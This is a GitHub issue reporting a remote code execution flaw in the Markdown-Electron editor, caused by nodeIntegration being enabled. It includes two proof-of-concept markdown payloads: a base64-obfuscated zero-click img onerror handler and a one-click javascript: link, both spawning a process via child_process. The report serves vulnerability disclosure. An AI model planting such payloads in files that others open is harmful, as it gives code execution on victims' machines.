Markdown-Electron icon indicating copy to clipboard operation
Markdown-Electron copied to clipboard
verified publisher icon JP1016

Incorrect electron configuration causes RCE

Open secnotes opened this issue 2 years ago • 1 comments

nodeIntegration: true decide Node APIs are enabled in renderer. And Markdown Editor does not filter dangerous operations. When we use this software to open the unknown markdwon file, it may cause Remote code execution (RCE).

EXP

# 0 click
<img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'>
# 1 click
<a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a>

poc

secnotes avatar Feb 03 '23 06:02 secnotes

In the trial to open a fork

LightYagami28 avatar Mar 14 '25 09:03 LightYagami28